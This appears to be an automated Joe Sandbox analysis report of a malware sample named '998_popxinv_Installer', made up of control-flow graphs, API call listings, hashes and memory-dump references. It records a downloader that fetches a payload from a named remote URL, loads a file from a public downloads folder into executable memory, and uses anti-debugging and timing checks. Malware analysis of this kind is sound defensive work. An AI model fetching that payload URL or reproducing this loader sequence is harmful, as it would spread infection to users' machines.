              • Opcode Fuzzy Hash: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
              • Instruction Fuzzy Hash: 632165B620530A6FD720DA65CD88E7BB7ECEB84302B05083FBA47D2551EBB5E5058661

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 75 a1297c-a1298e call a14948 78 a12990-a12992 75->78 79 a12994-a1299e 75->79 80 a129bc-a129c9 78->80 81 a129a0-a129a9 79->81 82 a129cc-a129cf 79->82 81->82 85 a129ab-a129b7 81->85 83 a129d1-a129db call a1199e 82->83 84 a129ec-a129ef 82->84 90 a129f1-a12a0d call a1252a 83->90 91 a129dd-a129e1 call a11fe2 83->91 87 a129bb 84->87 88 a129b9 85->88 87->80 88->87 96 a12a10-a12a17 90->96 94 a129e6-a129ea 91->94 94->84 94->88 97 a12aa4-a12aa7 96->97 98 a12a1d-a12a20 96->98 99 a12a22-a12a45 97->99 98->99 101 a12ac2 99->101 102 a12a47-a12a4a 99->102 105 a12ac5-a12ad3 call a11c2a 101->105 103 a12aac-a12aaf 102->103 104 a12a4c-a12a53 102->104 103->101 106 a12ab1-a12ac0 call a11fe2 103->106 107 a12a55 104->107 108 a12a58-a12a5d 104->108 105->87 106->101 117 a12ad8-a12adb 106->117 107->108 111 a12a5f-a12a66 108->111 112 a12a7e-a12a88 108->112 115 a12a68 111->115 116 a12a6b-a12a7c call a1566a 111->116 112->117 118 a12a8a-a12a8c 112->118 115->116 116->101 116->112 117->105 118->96 120 a12a8e-a12a92 118->120 120->101 122 a12a94-a12a9f call a12420 120->122 122->96
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: Fputc$H_prolog
              • String ID:
              • API String ID: 1896196775-3916222277
              • Opcode ID: 1e9a83093be4347680d4676884fe56f7dc2696a623a8158a5de45012a77fd3a4
              • Instruction ID: 3e49c7e54ed862efdb836e69f4cba2816150ec192fc4d97dbdfb175a49d9d299
              • Opcode Fuzzy Hash: 1e9a83093be4347680d4676884fe56f7dc2696a623a8158a5de45012a77fd3a4
              • Instruction Fuzzy Hash: D4416E31A01609DFCF25CB98CA80AEEB7F5FF58750F24091AE542A7280E771ED94CB60

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 125 3ae00cd-3ae00e2 127 3ae00ea-3ae00fb 125->127 128 3ae00e4-3ae00e5 125->128 131 3ae01ab 127->131 132 3ae0101-3ae010c 127->132 129 3ae01af-3ae01b2 128->129 133 3ae01ad-3ae01ae 131->133 132->131 134 3ae0112-3ae0120 VirtualProtect 132->134 133->129 134->131 135 3ae0126-3ae0160 call 3ae161e call 3ae18bb VirtualProtect 134->135 135->131 141 3ae0162-3ae016e 135->141 141->131 142 3ae0170-3ae017e VirtualProtect 141->142 142->131 143 3ae0180-3ae01a9 call 3ae161e call 3ae18bb VirtualProtect 142->143 143->133
              APIs
              • VirtualProtect.KERNEL32(00000000,000016CC,00000040,?), ref: 03AE011B
              • VirtualProtect.KERNEL32(00000000,000016CC,?,?), ref: 03AE014E
              • VirtualProtect.KERNEL32(00000000,00402AD1,00000040,?), ref: 03AE0179
              • VirtualProtect.KERNEL32(00000000,00402AD1,?,?), ref: 03AE01A3
              Memory Dump Source
              • Source File: 00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3ad0000_998_popxinv_Installer.jbxd
              Yara matches
              Similarity
              • API ID: ProtectVirtual
              • String ID:
              • API String ID: 544645111-0
              • Opcode ID: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
              • Instruction ID: 0c2b1754bd67c8ab34556bb100d248fec06573af23923cd7cb7bb308dc4edf78
              • Opcode Fuzzy Hash: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
              • Instruction Fuzzy Hash: 0B2195B63047496FE320DA62CD88E7BB7FCEB88241B04083EBA87D5541EBB4F5058670

              Control-flow Graph

              APIs
                • Part of subcall function 00A11186: __time64.LIBCMT ref: 00A1118E
                • Part of subcall function 00A11186: _rand.LIBCMT ref: 00A1119E
                • Part of subcall function 00A11186: _rand.LIBCMT ref: 00A111AD
              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 00A12F4B
                • Part of subcall function 00A12E55: __EH_prolog.LIBCMT ref: 00A12E5A
                • Part of subcall function 00A12E55: InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00A12E76
                • Part of subcall function 00A12E55: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00A12E93
                • Part of subcall function 00A12E55: InternetReadFile.WININET(?,?,00001000,?), ref: 00A12EF9
                • Part of subcall function 00A12E55: InternetCloseHandle.WININET(?), ref: 00A12F0F
                • Part of subcall function 00A12E55: InternetCloseHandle.WININET(?), ref: 00A12F27
              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A12F6C
                • Part of subcall function 00A1168B: _wprintf.LIBCMT ref: 00A1169D
                • Part of subcall function 00A1168B: _wprintf.LIBCMT ref: 00A116B5
                • Part of subcall function 00A1168B: _wprintf.LIBCMT ref: 00A116CA
                • Part of subcall function 00A1168B: _wprintf.LIBCMT ref: 00A116E2
                • Part of subcall function 00A111E1: GetTickCount64.KERNEL32 ref: 00A111EF
                • Part of subcall function 00A111E1: Sleep.KERNEL32(0000012C), ref: 00A111F9
                • Part of subcall function 00A111E1: GetTickCount64.KERNEL32 ref: 00A111FF
                • Part of subcall function 00A111E1: CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00A11244
                • Part of subcall function 00A111E1: GetFileSize.KERNEL32(00000000,00000000), ref: 00A1124E
                • Part of subcall function 00A111E1: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00A1125F
                • Part of subcall function 00A111E1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A11270
                • Part of subcall function 00A111E1: CloseHandle.KERNEL32(00000000), ref: 00A11277
              Strings
              • C:\Users\Public\Downloads\ind.jpg, xrefs: 00A12F51
              • http://guanlix.cn:881/998.ccp, xrefs: 00A12F56
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: Internet$File_wprintf$CloseHandleVirtual$AllocCount64OpenReadTick_rand$CreateFreeH_prologSizeSleep__time64
              • String ID: C:\Users\Public\Downloads\ind.jpg$http://guanlix.cn:881/998.ccp
              • API String ID: 2148924518-3025796919
              • Opcode ID: d52e6ce53dcd2df1b0720732b23accedfd1c59f0c7c1667eb3d807a0e9787539
              • Instruction ID: 668f5b466e962767dc6360084ca7b633d2e92a14e204eb2b74a08892b6fb27b4
              • Opcode Fuzzy Hash: d52e6ce53dcd2df1b0720732b23accedfd1c59f0c7c1667eb3d807a0e9787539
              • Instruction Fuzzy Hash: 3DE017722883207AF661B3F87D0BFEB1518EB00F51F214925F745A90C2DA9569839669

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 252 3adfb37-3adfb76 call 3ae1628 * 2 257 3adfb7c-3adfb7e 252->257 258 3adfd91 252->258 257->258 260 3adfb84-3adfb95 VirtualAlloc 257->260 259 3adfd94-3adfd9b 258->259 260->258 261 3adfb9b-3adfbe9 call 3ae18bb call 3ae18df call 3ae17ba call 3ae1695 260->261 270 3adfbef-3adfbf5 261->270 271 3adfd3e-3adfd4a 261->271 270->271 274 3adfbfb-3adfc15 call 3ae1628 270->274 272 3adfd4c-3adfd54 271->272 273 3adfd7a-3adfd8f call 3ae18df 271->273 272->273 275 3adfd56-3adfd73 call 3ae18df 272->275 273->259 274->258 281 3adfc1b-3adfc23 274->281 275->273 283 3adfc3b-3adfc41 281->283 284 3adfc25 281->284 287 3adfc77-3adfc82 283->287 288 3adfc43-3adfc46 283->288 286 3adfc2b-3adfc39 LoadLibraryA 284->286 286->283 286->286 291 3adfc99-3adfca2 287->291 292 3adfc84-3adfc8d call 3ae01b3 287->292 290 3adfc49-3adfc62 call 3ae1628 288->290 302 3adfc68-3adfc75 290->302 303 3adfd3a 290->303 295 3adfca4 291->295 296 3adfca6-3adfcad 291->296 292->303 306 3adfc93 292->306 295->296 297 3adfcaf-3adfcb8 call 3adffe7 296->297 298 3adfcd5-3adfcd8 296->298 311 3adfcba-3adfcc0 297->311 312 3adfcc2-3adfcc3 call 3ae00cd 297->312 304 3adfcda-3adfcdd 298->304 305 3adfd33-3adfd34 call 3ae0eca 298->305 302->287 302->290 303->271 304->305 309 3adfcdf-3adfce2 304->309 310 3adfd39 305->310 306->291 313 3adfce4-3adfce6 309->313 314 3adfd07-3adfd16 call 3ae09f9 309->314 310->303 311->303 311->312 318 3adfcc8-3adfccb 312->318 313->314 317 3adfce8-3adfceb 313->317 324 3adfd18-3adfd1e call 3ae0c04 314->324 325 3adfd25-3adfd31 call 3ae058d 314->325 320 3adfced-3adfcf0 317->320 321 3adfcff-3adfd05 call 3ae1351 317->321 318->298 323 3adfccd-3adfcd3 318->323 320->321 326 3adfcf2-3adfcf5 320->326 321->310 323->298 323->303 332 3adfd23-3adfd24 324->332 325->310 326->303 327 3adfcf7-3adfcfd call 3ae14e2 326->327 327->310 332->325
              APIs
              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 03ADFB8F
              • LoadLibraryA.KERNEL32(00000238), ref: 03ADFC2C
              Memory Dump Source
              • Source File: 00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3ad0000_998_popxinv_Installer.jbxd
              Yara matches
              Similarity
              • API ID: AllocLibraryLoadVirtual
              • String ID:
              • API String ID: 3550616410-0
              • Opcode ID: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
              • Instruction ID: 1f24726b12afef2d4eb0f92278b074cf05180a5fb564b59bed09325fb2e3914c
              • Opcode Fuzzy Hash: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
              • Instruction Fuzzy Hash: 9261D276501B02AFCB31EBA4CD84A9BB3E9FF05218F180A1FEA9B49540E735F161CB51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 335 a15902-a1591e call a1a9b0 338 a15920-a15933 call a1a95f call a1a90d 335->338 339 a15935-a15939 335->339 347 a15942-a15947 call a1a9f5 338->347 341 a15948-a15954 call a150e4 call a15895 339->341 342 a1593b 339->342 352 a15959-a15969 call a1596e 341->352 344 a1593f 342->344 344->347 352->344
              APIs
                • Part of subcall function 00A1A95F: __getptd_noexit.LIBCMT ref: 00A1A95F
              • __lock_file.LIBCMT ref: 00A15949
                • Part of subcall function 00A150E4: __lock.LIBCMT ref: 00A15109
              • __fclose_nolock.LIBCMT ref: 00A15954
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
              • String ID:
              • API String ID: 2800547568-0
              • Opcode ID: 98e8c93f8f31c3312728681225f2737f6dbb6a16984a9406ca9d0257d221b14b
              • Instruction ID: 64026bae24a9b7810eba3611e0f2ae874d6d182d1ba49134e187224f3fd0809a
              • Opcode Fuzzy Hash: 98e8c93f8f31c3312728681225f2737f6dbb6a16984a9406ca9d0257d221b14b
              • Instruction Fuzzy Hash: 72F09031C01B15DADB10ABB48A02BDE7BA06F81335F258649A475AA1C2C7785AC19A96

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 448 5fa75e0-5fa75eb 449 5fa75ed-5fa7614 call 5fa5ebc 448->449 450 5fa7615-5fa7634 call 5fa6f64 448->450 456 5fa763a-5fa7699 450->456 457 5fa7636-5fa7639 450->457 464 5fa769b-5fa769e 456->464 465 5fa769f-5fa772c GlobalMemoryStatusEx 456->465 469 5fa772e-5fa7734 465->469 470 5fa7735-5fa775d 465->470 469->470
              Memory Dump Source
              • Source File: 00000000.00000002.3872627570.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5fa0000_998_popxinv_Installer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8089a8a822e534191556605bd13b24c7ae48c09cab3c56735fa2ba35a32cb00a
              • Instruction ID: f83ff40aeb77e8a3330921635b5e56a9e33ddc4c686840de7da9aa7e609043a1
              • Opcode Fuzzy Hash: 8089a8a822e534191556605bd13b24c7ae48c09cab3c56735fa2ba35a32cb00a
              • Instruction Fuzzy Hash: A0412072E043498FCB14DFB9D8047AEBBF5EF89210F14866AD449A7340DB789881CBD1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 473 a11848-a1185b 474 a11861 473->474 475 a11906-a1190e 473->475 476 a11863-a11866 474->476 477 a1186c-a1186e 474->477 476->475 476->477 478 a11872-a11877 477->478 479 a11879-a1187c 478->479 480 a1187e-a11885 478->480 479->480 481 a11887 480->481 482 a118c8-a118d3 call a1297c 480->482 483 a11889-a1188b 481->483 484 a1188d-a11890 481->484 487 a118d6-a118d9 482->487 483->482 483->484 485 a11892 484->485 486 a1189f-a118c6 call a13dd0 484->486 488 a11894-a11897 485->488 489 a11899-a1189c 485->489 494 a118ee-a118f2 486->494 491 a11904-a11905 487->491 492 a118db-a118ea 487->492 488->486 488->489 489->486 491->475 492->494 495 a11870 494->495 496 a118f8 494->496 495->478 496->491 497 a118fa-a118fe 496->497 497->491 497->495
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: _memmove
              • String ID:
              • API String ID: 4104443479-0
              • Opcode ID: 8350eb834088de25137d2a4917a541500a83b05048782ec135a262c8e125f95f
              • Instruction ID: 299e43acffd8afad5d817014149235c422be0115e26b9527e9e85dba4d774f63
              • Opcode Fuzzy Hash: 8350eb834088de25137d2a4917a541500a83b05048782ec135a262c8e125f95f
              • Instruction Fuzzy Hash: D4311635900619EFCB14CF59C8846D9B7B5FF09365F24C26AEA24872A1E370DE90CF81
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 51e7d1ef76a4a06e88552693cf5fcb15f8444809c103173d56bf7df7687abf61
              • Instruction ID: 22d65e94d43de6b716cb2bdecad9a40572e0a3bc7b2556d5fab943707f2bb657
              • Opcode Fuzzy Hash: 51e7d1ef76a4a06e88552693cf5fcb15f8444809c103173d56bf7df7687abf61
              • Instruction Fuzzy Hash: D8112BB1A10215AFDB10DF98D981AABF7E9EF44744F04882EF4469B241C7B1DD51CB60
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: e976f15df3dd7a838e372f21fbe6921f382e87f69489cf59789b36b5bbc326d8
              • Instruction ID: de6bc1e529b3b6a436e4433f93e22222f63041e025d667d3fdae863687d477d4
              • Opcode Fuzzy Hash: e976f15df3dd7a838e372f21fbe6921f382e87f69489cf59789b36b5bbc326d8
              • Instruction Fuzzy Hash: 84112BB1A10215AFDB10DF98D981AABF7E9EB44744F04882EE44697241C7B1DD51CB60
              APIs
              • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05FA7632), ref: 05FA771F
              Memory Dump Source
              • Source File: 00000000.00000002.3872627570.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5fa0000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: GlobalMemoryStatus
              • String ID:
              • API String ID: 1890195054-0
              • Opcode ID: 950be8d6a64e499fdb0aa23db1a30c43fb21b4eec3c67426dbb6669823a0a6f2
              • Instruction ID: c5fa5739ec1159e9adbc0ce83337abf2e5d4d6fff7d9332cec724f43ac9147d6
              • Opcode Fuzzy Hash: 950be8d6a64e499fdb0aa23db1a30c43fb21b4eec3c67426dbb6669823a0a6f2
              • Instruction Fuzzy Hash: F51117B2C006599BDB10CFAAC445BDEFBF4EF48214F15812AE818A7640D378A941CFE5
              APIs
              • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05FA7632), ref: 05FA771F
              Memory Dump Source
              • Source File: 00000000.00000002.3872627570.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5fa0000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: GlobalMemoryStatus
              • String ID:
              • API String ID: 1890195054-0
              • Opcode ID: 112dd46c00b86949d209fbb22859ae103f3c64e53bce439347e2cacfcb6bc09f
              • Instruction ID: be9c0457856fb3c0cd0da53f46c92df9c05da1ffc00562b6f4c15b16acf06bc6
              • Opcode Fuzzy Hash: 112dd46c00b86949d209fbb22859ae103f3c64e53bce439347e2cacfcb6bc09f
              • Instruction Fuzzy Hash: 131117B2C056599BDB10DFAAC444BDEFBF4EF48214F14816AE828B7240D378A940CFE5
              APIs
              • __EH_prolog.LIBCMT ref: 00A12485
                • Part of subcall function 00A1130B: std::locale::facet::_Incref.LIBCPMT ref: 00A1131E
                • Part of subcall function 00A1235C: __EH_prolog.LIBCMT ref: 00A12361
                • Part of subcall function 00A1235C: std::_Lockit::_Lockit.LIBCPMT ref: 00A12370
                • Part of subcall function 00A1235C: int.LIBCPMT ref: 00A12387
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
              • String ID:
              • API String ID: 3551698239-0
              • Opcode ID: a0b7de5d2472361333bac47e0e482ee0b0649713959123b915680f8e3809cf89
              • Instruction ID: fcd982c0f7688cfbada87cab5988feb68ec24128c83de22b0df83174fc7f66df
              • Opcode Fuzzy Hash: a0b7de5d2472361333bac47e0e482ee0b0649713959123b915680f8e3809cf89
              • Instruction Fuzzy Hash: 86F09032A00118AFCF15EF54CE01BEE73A9AB18B01F004429F516D6582DBB8CAE0C794
              APIs
              • __EH_prolog.LIBCMT ref: 00A12485
                • Part of subcall function 00A1130B: std::locale::facet::_Incref.LIBCPMT ref: 00A1131E
                • Part of subcall function 00A1235C: __EH_prolog.LIBCMT ref: 00A12361
                • Part of subcall function 00A1235C: std::_Lockit::_Lockit.LIBCPMT ref: 00A12370
                • Part of subcall function 00A1235C: int.LIBCPMT ref: 00A12387
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
              • String ID:
              • API String ID: 3551698239-0
              • Opcode ID: 79eaa7a5f92dd91f6327d5e40c0eb93298e14f644992e287d1ab6ce0112a2472
              • Instruction ID: 8dcaa0b164db1ede259d345ab66cc2c679d6ab6d4af8c79fd79d1e15c96177d6
              • Opcode Fuzzy Hash: 79eaa7a5f92dd91f6327d5e40c0eb93298e14f644992e287d1ab6ce0112a2472
              • Instruction Fuzzy Hash: 80F0B432A10158AFCF15EF64CE01BEE73A9AB18701F004429F916D6581DBB4CAE0C784
              Memory Dump Source
              • Source File: 00000000.00000002.3870739802.0000000003B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B2D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3b2d000_998_popxinv_Installer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0ecfc957c12b731caeb5daaa8490c92b866e85d6e75fea6350c32ba45c225943
              • Instruction ID: 6312484f2cce51f2ae84fdc9da788473b25c729dfcf7f7a39d7f14e88cee650c
              • Opcode Fuzzy Hash: 0ecfc957c12b731caeb5daaa8490c92b866e85d6e75fea6350c32ba45c225943
              • Instruction Fuzzy Hash: 2F210371604244DFDB06EF50D9C4B26BFA5FB88318F2486BDE81D4B256C336D456CAA2
              Memory Dump Source
              • Source File: 00000000.00000002.3870739802.0000000003B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B2D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3b2d000_998_popxinv_Installer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 061b43f9f55bc8c590b9c9c46c782dfd97981b19fafe3d8fadcc20d7327e92d2
              • Instruction ID: 88317b74a2f637bbd282523fb0b2fb340f53fa93ef4b7db45f1c3bfdb19106e0
              • Opcode Fuzzy Hash: 061b43f9f55bc8c590b9c9c46c782dfd97981b19fafe3d8fadcc20d7327e92d2
              • Instruction Fuzzy Hash: CB11AF76504244CFCB06DF10D5C4B16BF62FB84318F28C6EDD8490B656C336D45ACBA1
              Memory Dump Source
              • Source File: 00000000.00000002.3870739802.0000000003B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B2D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3b2d000_998_popxinv_Installer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e55426785160cc9deb1ccf35fcab1f039234302413d9d20ce5485a3c4bc39d05
              • Instruction ID: e996d937794766acf471e4cc30383c86569d335c73ad623363f99a66ce9de08f
              • Opcode Fuzzy Hash: e55426785160cc9deb1ccf35fcab1f039234302413d9d20ce5485a3c4bc39d05
              • Instruction Fuzzy Hash: 22015E7140D3D09FE7168B258C94752BFA8DF53228F1D85DBE8988F1A3C2695C45CBB2
              Memory Dump Source
              • Source File: 00000000.00000002.3870739802.0000000003B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B2D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3b2d000_998_popxinv_Installer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1fa6416d16d147a9c0b9f7386889ab47bde89432150678d8dbcd7fafd96cae98
              • Instruction ID: 63f594f54f18719581405ed4fb81f60689ee1821f1ff3686a92c483d8995a714
              • Opcode Fuzzy Hash: 1fa6416d16d147a9c0b9f7386889ab47bde89432150678d8dbcd7fafd96cae98
              • Instruction Fuzzy Hash: 0801A771508350ABE7208F25C884767FFD8DF45628F18C6AEDD6C4E152C7799841C6B2
              APIs
              • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00A1FB0A,?,00A16AFC,?,000000BC,?,00000001,00000000,00000000), ref: 00A1F50C
              • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00A1FB0A,?,00A16AFC,?,000000BC,?,00000001,00000000,00000000), ref: 00A1F535
              • GetACP.KERNEL32(?,?,00A1FB0A,?,00A16AFC,?,000000BC,?,00000001,00000000), ref: 00A1F549
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: InfoLocale
              • String ID: ACP$OCP
              • API String ID: 2299586839-711371036
              • Opcode ID: 4291571c344a28f2c19b18e4d2ba43e9a214238dcc011f5d45f07b6110d8bd94
              • Instruction ID: 1132bb11015e88f0a96b2a7ce1f24dfdfa73459bfb39c4768f02cbfa06bdfd0d
              • Opcode Fuzzy Hash: 4291571c344a28f2c19b18e4d2ba43e9a214238dcc011f5d45f07b6110d8bd94
              • Instruction Fuzzy Hash: AC018F31605247BEEF21DF69BD0ABEE77AAAF01768F204534F401E1481EB60DA829665
              APIs
              • IsDebuggerPresent.KERNEL32 ref: 00A1E003
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A1E018
              • UnhandledExceptionFilter.KERNEL32(00A2AEF0), ref: 00A1E023
              • GetCurrentProcess.KERNEL32(C0000409), ref: 00A1E03F
              • TerminateProcess.KERNEL32(00000000), ref: 00A1E046
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
